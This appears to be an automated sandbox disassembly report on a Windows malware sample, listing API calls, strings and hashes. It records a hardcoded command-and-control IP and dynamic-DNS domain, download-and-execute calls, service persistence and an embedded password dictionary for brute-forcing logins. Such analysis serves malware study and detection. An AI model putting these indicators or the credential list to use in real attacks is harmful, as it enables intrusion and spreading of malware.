                                                                                                • Part of subcall function 0040336C: GetProcAddress.KERNEL32(00000000), ref: 00403392
                                                                                                • Part of subcall function 0040336C: LoadLibraryA.KERNEL32(WS2_32.dll,closesocket), ref: 0040339D
                                                                                                • Part of subcall function 0040336C: GetProcAddress.KERNEL32(00000000), ref: 004033A0
                                                                                                • Part of subcall function 0040336C: _mbscpy.MSVCRT(?,00000000,EhETHRcLHRAXHREQEAkLEwsTQw==), ref: 004033CF
                                                                                                • Part of subcall function 0040336C: strstr.MSVCRT ref: 004033E0
                                                                                                • Part of subcall function 0040336C: memset.MSVCRT ref: 004033F9
                                                                                                • Part of subcall function 0040336C: strcspn.MSVCRT ref: 00403410
                                                                                                • Part of subcall function 0040336C: strncpy.MSVCRT ref: 0040341B
                                                                                                • Part of subcall function 0040336C: strcspn.MSVCRT ref: 0040342D
                                                                                                • Part of subcall function 0040336C: atoi.MSVCRT(?), ref: 00403437
                                                                                                • Part of subcall function 0040336C: socket.WS2_32(00000002,00000001,00000000), ref: 00403468
                                                                                                • Part of subcall function 0040336C: connect.WS2_32(00000000,00000002,00000010), ref: 00403477
                                                                                                • Part of subcall function 00403492: setsockopt.WS2_32(?,0000FFFF,00000008,?,00000004), ref: 004034A8
                                                                                                • Part of subcall function 00403492: WSAIoctl.WS2_32(?,98000004,?,0000000C,00000000,00000000,?,00000000,00000000), ref: 004034DD
                                                                                              • memset.MSVCRT ref: 0040392A
                                                                                                • Part of subcall function 00406090: LoadLibraryA.KERNEL32(ADVAPI32.dll,RegCloseKey,76F8F550), ref: 004060A4
                                                                                                • Part of subcall function 00406090: GetProcAddress.KERNEL32(00000000), ref: 004060AB
                                                                                                • Part of subcall function 00406090: LoadLibraryA.KERNEL32(KERNEL32.dll,GetVersionExA), ref: 004060C1
                                                                                                • Part of subcall function 00406090: GetProcAddress.KERNEL32(00000000), ref: 004060C8
                                                                                                • Part of subcall function 00406090: GetSystemDefaultUILanguage.KERNEL32 ref: 004060D4
                                                                                                • Part of subcall function 00406090: memset.MSVCRT ref: 004060F2
                                                                                                • Part of subcall function 00406090: _mbscpy.MSVCRT(0000005D,0000004E), ref: 00406254
                                                                                                • Part of subcall function 00406090: _mbscpy.MSVCRT(0000005D,2000), ref: 00406283
                                                                                                • Part of subcall function 004034E5: wsprintfA.USER32 ref: 004034FC
                                                                                                • Part of subcall function 004034E5: LoadLibraryA.KERNELBASE(?), ref: 0040350C
                                                                                              • memcpy.MSVCRT(?,?,000000B0), ref: 00403988
                                                                                              • send.WS2_32(?,?,00000000), ref: 004039A8
                                                                                              • memset.MSVCRT ref: 00403A3F
                                                                                              • lstrcpyn.KERNEL32(00409328,?,00000080), ref: 00403AE0
                                                                                              • lstrlen.KERNEL32(00409328,00000200), ref: 00403AEC
                                                                                              • lstrcpyn.KERNEL32(004093A8,?), ref: 00403AFF
                                                                                              • lstrcpyn.KERNEL32(004090E0,?,00000080), ref: 00403B90
                                                                                              • lstrlen.KERNEL32(004090E0,00000080), ref: 00403B9C
                                                                                              • lstrcpyn.KERNEL32(00409160,?), ref: 00403BAF
                                                                                              • lstrcpyn.KERNEL32(004091F8,?,00000104), ref: 00403BCF
                                                                                              • GetDesktopWindow.USER32 ref: 00403C7A
                                                                                              • ShellExecuteA.SHELL32(00000000), ref: 00403C81
                                                                                              • OpenMutexA.KERNEL32(001F0001,00000000,Defghi Klmnopqr Tuv), ref: 00403C93
                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 00403CA0
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00403CA7
                                                                                              • wsprintfA.USER32 ref: 00403D2E
                                                                                              • LoadLibraryA.KERNEL32(urlmon.dll), ref: 00403D4C
                                                                                              • GetProcAddress.KERNEL32(00000000,URLDownloadToFileA), ref: 00403D57
                                                                                              • GetTickCount.KERNEL32 ref: 00403DB9
                                                                                              • wsprintfA.USER32 ref: 00403DCC
                                                                                              • LoadLibraryA.KERNEL32(urlmon.dll), ref: 00403DEA
                                                                                              • GetProcAddress.KERNEL32(00000000,URLDownloadToFileA), ref: 00403DF5
                                                                                              • WinExec.KERNEL32(?,00000000), ref: 00403E27
                                                                                              • OpenMutexA.KERNEL32(001F0001,00000000,Defghi Klmnopqr Tuv), ref: 00403E50
                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 00403E5D
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00403E64
                                                                                              • memset.MSVCRT ref: 00403E7F
                                                                                              • sprintf.MSVCRT ref: 00403F20
                                                                                              • SHDeleteKeyA.SHLWAPI(80000002,?), ref: 00403F35
                                                                                                • Part of subcall function 0040355B: LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcatA,00000000,Defghi Klmnopqr Tuv,00000000), ref: 00403571
                                                                                                • Part of subcall function 0040355B: GetProcAddress.KERNEL32(00000000), ref: 00403578
                                                                                                • Part of subcall function 0040355B: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 004035D3
                                                                                                • Part of subcall function 0040355B: GetShortPathNameA.KERNEL32(?,?,00000104), ref: 004035E8
                                                                                                • Part of subcall function 0040355B: GetEnvironmentVariableA.KERNEL32(COMSPEC,?,00000104), ref: 004035FB
                                                                                                • Part of subcall function 0040355B: ShellExecuteEx.SHELL32(0000003C), ref: 00403675
                                                                                                • Part of subcall function 0040355B: SetPriorityClass.KERNEL32(?,00000040), ref: 00403689
                                                                                                • Part of subcall function 0040355B: GetCurrentProcess.KERNEL32(00000100), ref: 00403690
                                                                                                • Part of subcall function 0040355B: SetPriorityClass.KERNEL32(00000000), ref: 00403697
                                                                                                • Part of subcall function 0040355B: GetCurrentThread.KERNEL32 ref: 0040369B
                                                                                              • ExitProcess.KERNEL32 ref: 00403F4A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad$AddressProc$lstrcpynmemset$Mutex$_mbscpywsprintf$ClassCloseCurrentExecuteHandleNameOpenPriorityProcessReleaseShelllstrlenstrcspn$CountDefaultDeleteDesktopEnvironmentExecExitFileIoctlLanguageModulePathShortSystemThreadTickVariableWindowatoiconnectmemcpysendsetsockoptsocketsprintfstrncpystrstr
                                                                                              • String ID: %c%c%c%c%ccn.exe$%s%s$%s%s$.$C$C$Defghi Klmnopqr Tuv$E$F$GetTempPathA$KERNEL32.dll$M$S$S$S$S$T$URLDownloadToFileA$W$WS2_32.dll$Y$\$\$\$c$closesocket$e$e$e$e$e$e$e$e$e$e$e$i$i$i$i$kernel32.dll$kernel32.dll$l$l$l$lstrcatA$n$n$n$o$o$o$o$p$p$r$r$r$r$r$r$s$t$t$t$t$u$urlmon.dll$v$w$x$x
                                                                                              • API String ID: 1435032172-2364854850
                                                                                              • Opcode ID: e18265d271f6721ab9e9e9466f504cf459dc78a50ec6928034f8974f6ee0d570
                                                                                              • Instruction ID: 357b4b9f15481a77607b06fd34d37290313e3d44ecd54a07aa5cfd399732b663
                                                                                              • Opcode Fuzzy Hash: e18265d271f6721ab9e9e9466f504cf459dc78a50ec6928034f8974f6ee0d570
                                                                                              • Instruction Fuzzy Hash: 65329871D042C8EEEB11DBA4CD48BDE7FB96B15305F0400A9E184B7292C7BE5A58CB79

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(WS2_32.dll,closesocket), ref: 004055D8
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004055E1
                                                                                              • LoadLibraryA.KERNEL32(ADVAPI32.dll,SetServiceStatus), ref: 004055F1
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004055F4
                                                                                              • LoadLibraryA.KERNEL32(ADVAPI32.dll,RegisterServiceCtrlHandlerA), ref: 004055FF
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00405602
                                                                                              • SetServiceStatus.SECHOST(00000000,004090B8), ref: 00405655
                                                                                              • Sleep.KERNELBASE(000001F4), ref: 00405663
                                                                                              • LoadLibraryA.KERNEL32(0000004B,?), ref: 004056EF
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004056F2
                                                                                              • LoadLibraryA.KERNEL32(KERNEL32.dll,Get), ref: 0040574A
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0040574D
                                                                                              • LoadLibraryA.KERNEL32(KERNEL32.dll,?), ref: 0040578A
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0040578D
                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,Defghi Klmnopqr Tuv), ref: 00405796
                                                                                              • exit.MSVCRT ref: 004057A7
                                                                                              • wsprintfA.USER32 ref: 004057D2
                                                                                              • CreateThread.KERNELBASE(00000000,00000000,Function_00002DD5,00000000,00000000,00000000), ref: 004057FF
                                                                                              • Sleep.KERNELBASE(000001F4), ref: 00405806
                                                                                              • WSAStartup.WS2_32(00000202,?), ref: 0040581E
                                                                                              • CreateThread.KERNELBASE(00000000,00000000,Function_00005182,00000000,00000000,00000000), ref: 0040582A
                                                                                              • WSAStartup.WS2_32(00000202,?), ref: 00405838
                                                                                              • CreateThread.KERNELBASE(00000000,00000000,Function_000051E3,00000000,00000000,00000000), ref: 00405844
                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,Function_0000387C,00000000), ref: 00405859
                                                                                              • CloseHandle.KERNEL32 ref: 00405865
                                                                                              • closesocket.WS2_32 ref: 00405871
                                                                                              • Sleep.KERNELBASE(0000012C), ref: 00405883
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryLoadProc$Create$SleepThread$Startup$CloseHandleMutexObjectServiceSingleStatusWaitclosesocketexitwsprintf
                                                                                              • String ID: A$ADVAPI32.dll$C$C$Defghi Klmnopqr Tuv$E$G$Get$I$KERNEL32.dll$L$M$RegisterServiceCtrlHandlerA$SetServiceStatus$T$WS2_32.dll$a$a$a$closesocket$d$d$e$e$e$e$e$e$h$hra%u.dll$n$o$r$r$r$r$r$r$r$s$t$t$t$t$t$u$u$x
                                                                                              • API String ID: 2081735817-3768298475
                                                                                              • Opcode ID: 0829bc5678a68e0c4557f189000b03db2788a54d9899d5a03469cd2d06e6fe48
                                                                                              • Instruction ID: 2b90b7f98aae210445e73ef680a1d9401666750c7211a7faab133c9ec65b4e0f
                                                                                              • Opcode Fuzzy Hash: 0829bc5678a68e0c4557f189000b03db2788a54d9899d5a03469cd2d06e6fe48
                                                                                              • Instruction Fuzzy Hash: F3913670C082C8EDEB11D7A8DD4CBDEBFB99B15348F0440A9E54476292C7BD5A48CB7A

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(ADVAPI32.dll,RegQueryValueExA), ref: 00405365
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0040536E
                                                                                              • LoadLibraryA.KERNEL32(ADVAPI32.dll,RegCloseKey), ref: 00405379
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0040537C
                                                                                              • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcpyA), ref: 0040538B
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0040538E
                                                                                              • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcatA), ref: 0040539D
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004053A0
                                                                                              • RegOpenKeyExA.KERNELBASE(80000002,?,00000000,000F003F,?), ref: 00405464
                                                                                              • memset.MSVCRT ref: 00405483
                                                                                              • RegQueryValueExA.KERNELBASE(?,00000049,00000000,00000000,?,?), ref: 004054C6
                                                                                              • RegCloseKey.KERNELBASE(?), ref: 004054D5
                                                                                              • GetFileAttributesA.KERNELBASE(?), ref: 004054DF
                                                                                              • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004054FD
                                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0040550C
                                                                                              • GlobalAlloc.KERNELBASE(00000040,00000000), ref: 0040551C
                                                                                              • ReadFile.KERNELBASE(00000000,00000000,?,?,00000000), ref: 00405533
                                                                                              • GlobalFree.KERNEL32(?), ref: 00405540
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00405547
                                                                                              • CloseHandle.KERNELBASE(00000000), ref: 00405552
                                                                                              • BeginUpdateResourceA.KERNEL32(?,00000000), ref: 0040555C
                                                                                              • UpdateResourceA.KERNEL32(00000000,0000000A,00000066,00000000,?,?), ref: 0040557B
                                                                                              • lstrlen.KERNEL32(Defghi Klmnopqr Tuv), ref: 00405585
                                                                                              • UpdateResourceA.KERNEL32(?,0000000A,00000065,00000000,Defghi Klmnopqr Tuv,00000001), ref: 00405596
                                                                                              • EndUpdateResourceA.KERNEL32(?,00000000), ref: 0040559F
                                                                                              • GlobalFree.KERNEL32(?), ref: 004055AF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressFileLibraryLoadProcResourceUpdate$CloseGlobal$FreeHandle$AllocAttributesBeginCreateOpenQueryReadSizeValuelstrlenmemset
                                                                                              • String ID: ADVAPI32.dll$C$C$Defghi Klmnopqr Tuv$E$ImagePath$KERNEL32.dll$KERNEL32.dll$M$RegCloseKey$RegQueryValueExA$S$S$S$S$T$Y$\$\$\$c$e$e$e$e$i$l$lstrcatA$lstrcpyA$n$n$o$o$r$r$r$r$s$t$t$t$u$v
                                                                                              • API String ID: 2023098254-1497069993
                                                                                              • Opcode ID: 5691daac4824de2b6841b4b3c6b5525a01462119fc2637b3c2951bed404fc92c
                                                                                              • Instruction ID: 857f389ec30b06542d6cc4631e69be42d6d6ae2a8b7d483b04e891210c00ca0b
                                                                                              • Opcode Fuzzy Hash: 5691daac4824de2b6841b4b3c6b5525a01462119fc2637b3c2951bed404fc92c
                                                                                              • Instruction Fuzzy Hash: 14816070D042C8EEEF119BA4DC48BEFBEB99F15344F040065F544B62A1D7B94A48CB79

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 357 402dd5-402f90 call 402a59 360 402f96-402fc2 gethostname 357->360 361 4030f8-4030fa 357->361 362 402fc8-402fdc gethostbyname 360->362 363 4030ed-4030f7 WSACleanup 360->363 362->363 364 402fe2-402fe4 362->364 363->361 365 402fe7-402fed 364->365 365->363 366 402ff3-403035 memset memcpy 365->366 367 403036-40307f memset sprintf 366->367 368 403081 367->368 369 4030cb-4030db 367->369 371 403084-40308b 368->371 369->367 370 4030e1-4030e8 369->370 370->365 372 4030c4-4030c9 371->372 373 40308d 371->373 372->369 372->371 374 403093-4030a5 Sleep 373->374 375 4030c1 374->375 376 4030a7-4030b2 call 402ad0 374->376 375->372 378 4030b7-4030bf 376->378 378->374 378->375
                                                                                              APIs
                                                                                                • Part of subcall function 00402A59: WSAStartup.WS2_32(00000202,?), ref: 00402A6E
                                                                                              • gethostname.WS2_32(?,00000080), ref: 00402FBA
                                                                                              • gethostbyname.WS2_32(?), ref: 00402FCF
                                                                                              • memset.MSVCRT ref: 00402FFA
                                                                                              • memcpy.MSVCRT(?,00000000,?,?,00000000,00000010), ref: 0040300E
                                                                                              • memset.MSVCRT ref: 00403049
                                                                                              • sprintf.MSVCRT ref: 0040306F
                                                                                              • Sleep.KERNELBASE(000000C8), ref: 00403098
                                                                                              • WSACleanup.WS2_32 ref: 004030ED
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: memset$CleanupSleepStartupgethostbynamegethostnamememcpysprintf
                                                                                              • String ID: %d.%d.%d.%d$111$123$123$123456$12345678$1314520$5201314$88888$NULL$abc123$admin$administrator$alex$alex$angel$asdf$asdfgh$baby$bbbbbb$caonima$enter$game$guest$hack$home$home$love$love$memory$money$movie$movie$password$qwerty$root$root$test$test$time$user$woaini$xpuser$yeah
                                                                                              • API String ID: 2657193355-195746125
                                                                                              • Opcode ID: 05354827fa881561b6b3f17ce7718c656727c28b50fa67908cbf439bfa371650
                                                                                              • Instruction ID: ae78371e899d60bf5f5d828a76061139e061b110f9393b7dc49d63d24438a906
                                                                                              • Opcode Fuzzy Hash: 05354827fa881561b6b3f17ce7718c656727c28b50fa67908cbf439bfa371650
                                                                                              • Instruction Fuzzy Hash: 3C81FAB2D012599BDB21DF95C9486DEBBB4BB05308F50C0BBD5497B2A1C7B84B88CF58

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 412 4059f4-405afe LoadLibraryA GetProcAddress _mbscpy _mbscat RegOpenKeyExA 413 405b00-405b08 412->413 414 405b0a 412->414 415 405b0c-405b0f 413->415 414->415
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(ADVAPI32.dll,RegCloseKey), ref: 00405A09
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00405A10
                                                                                              • _mbscpy.MSVCRT(00000000,00000053), ref: 00405AC6
                                                                                              • _mbscat.MSVCRT ref: 00405AD7
                                                                                              • RegOpenKeyExA.KERNELBASE(80000002,00000000,00000000,000F003F,?), ref: 00405AF6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryLoadOpenProc_mbscat_mbscpy
                                                                                              • String ID: ADVAPI32.dll$C$C$Defghi Klmnopqr Tuv$E$M$RegCloseKey$S$S$S$S$SYSTEM\CurrentControlSet\Services\$T$Y$\$\$\$c$e$e$e$e$i$l$n$n$o$o$r$r$r$r$s$t$t$t$u$v
                                                                                              • API String ID: 1994725845-1712674794
                                                                                              • Opcode ID: fe1cd4cbf34c5d281c3dbb1e64282f5bf3c4517e78142a43a9fbfdfd1bffe10b
                                                                                              • Instruction ID: 35d77256bc8034983bafe4ceb320269e5385723e05cff16902321712d41d725d
                                                                                              • Opcode Fuzzy Hash: fe1cd4cbf34c5d281c3dbb1e64282f5bf3c4517e78142a43a9fbfdfd1bffe10b
                                                                                              • Instruction Fuzzy Hash: EA410F11D0C2C9E9EB12D2A8C9097DEBFB54B16749F0840D9D2847A2D2C2FE575887B6

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(WS2_32.dll,htons,76F8F550,76F90BD0,00000000), ref: 00403389
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00403392
                                                                                              • LoadLibraryA.KERNEL32(WS2_32.dll,closesocket), ref: 0040339D
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004033A0
                                                                                              • _mbscpy.MSVCRT(?,00000000,EhETHRcLHRAXHREQEAkLEwsTQw==), ref: 004033CF
                                                                                              • strstr.MSVCRT ref: 004033E0
                                                                                              • memset.MSVCRT ref: 004033F9
                                                                                              • strcspn.MSVCRT ref: 00403410
                                                                                              • strncpy.MSVCRT ref: 0040341B
                                                                                              • strcspn.MSVCRT ref: 0040342D
                                                                                              • atoi.MSVCRT(?), ref: 00403437
                                                                                              • socket.WS2_32(00000002,00000001,00000000), ref: 00403468
                                                                                              • connect.WS2_32(00000000,00000002,00000010), ref: 00403477
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryLoadProcstrcspn$_mbscpyatoiconnectmemsetsocketstrncpystrstr
                                                                                              • String ID: 120.48.34.233$EhETHRcLHRAXHREQEAkLEwsTQw==$WS2_32.dll$closesocket$htons
                                                                                              • API String ID: 2255542143-3763905265
                                                                                              • Opcode ID: d1af9a050918730770f70f886657c6e6b1d211d4c2088a602517dbf745d6cec9
                                                                                              • Instruction ID: 6aa5ca56811b2828efdf987d7b23adbf84b4b011ef7c06a256cd014a8a3b1787
                                                                                              • Opcode Fuzzy Hash: d1af9a050918730770f70f886657c6e6b1d211d4c2088a602517dbf745d6cec9
                                                                                              • Instruction Fuzzy Hash: D931B871900218BBDB10ABB49D49FDF7A6CAF05314F104577F609F72E1DA785A448BA8

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 429 406a48-406abd __set_app_type __p__fmode __p__commode call 406bc7 432 406acb-406b22 call 406bb2 _initterm __getmainargs _initterm 429->432 433 406abf-406aca __setusermatherr 429->433 436 406b24-406b2c 432->436 437 406b5e-406b61 432->437 433->432 440 406b32-406b35 436->440 441 406b2e-406b30 436->441 438 406b63-406b67 437->438 439 406b3b-406b3f 437->439 438->437 442 406b41-406b43 439->442 443 406b45-406b56 GetStartupInfoA 439->443 440->439 444 406b37-406b38 440->444 441->436 441->440 442->443 442->444 445 406b58-406b5c 443->445 446 406b69-406b6b 443->446 444->439 447 406b6c-406b77 GetModuleHandleA call 40597d 445->447 446->447 449 406b7c-406b99 exit _XcptFilter 447->449
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                                                              • String ID:
                                                                                              • API String ID: 801014965-0
                                                                                              • Opcode ID: 8843e61d07e986c3672b824004c4519e78d1453bad07b663c43a0e9dfb3d122a
                                                                                              • Instruction ID: ce64524e5db3081824dfc069b3bde325727510d573eb5451e936e5ebab442623
                                                                                              • Opcode Fuzzy Hash: 8843e61d07e986c3672b824004c4519e78d1453bad07b663c43a0e9dfb3d122a
                                                                                              • Instruction Fuzzy Hash: 0F417EB1900364AFCB249FA5DD85AAA7BB8EB09710B20013FF592B72E1D7785940CB18

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 461 406c10-406c38 LoadLibraryA GetProcAddress inet_addr 462 406c3a-406c3f gethostbyname 461->462 463 406c4b-406c4d 461->463 464 406c41-406c43 462->464 465 406c44-406c49 462->465 465->463
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(WS2_32.dll,gethostbyname,76F8F550,76F90BD0,00404875,chinagov.8800.org), ref: 00406C1C
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00406C23
                                                                                              • inet_addr.WS2_32(?), ref: 00406C30
                                                                                              • gethostbyname.WS2_32(?), ref: 00406C3B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryLoadProcgethostbynameinet_addr
                                                                                              • String ID: WS2_32.dll$gethostbyname
                                                                                              • API String ID: 688652319-1612545655
                                                                                              • Opcode ID: 681b35af2eda01de744f1b5af480ae26578f1e9ffe207a50f620d86b6acd63d2
                                                                                              • Instruction ID: fa684150f8c7a78303bc788c4e7da3796caaeb6c4f1dce52f515438040d0683d
                                                                                              • Opcode Fuzzy Hash: 681b35af2eda01de744f1b5af480ae26578f1e9ffe207a50f620d86b6acd63d2
                                                                                              • Instruction Fuzzy Hash: 2DE09A393042009BE3049B26FE48DAA3BE8DAC9722305407AF942E3260C334C8428A68

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • WSAStartup.WS2_32(00000202), ref: 004050DB
                                                                                              • CreateThread.KERNELBASE(00000000,00000000,0040407C,00000000,00000000,00000000), ref: 004050ED
                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004050FB
                                                                                              • CloseHandle.KERNEL32 ref: 00405107
                                                                                              • closesocket.WS2_32 ref: 00405113
                                                                                              • Sleep.KERNELBASE(0000012C), ref: 0040511E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                                                                              Yara matches
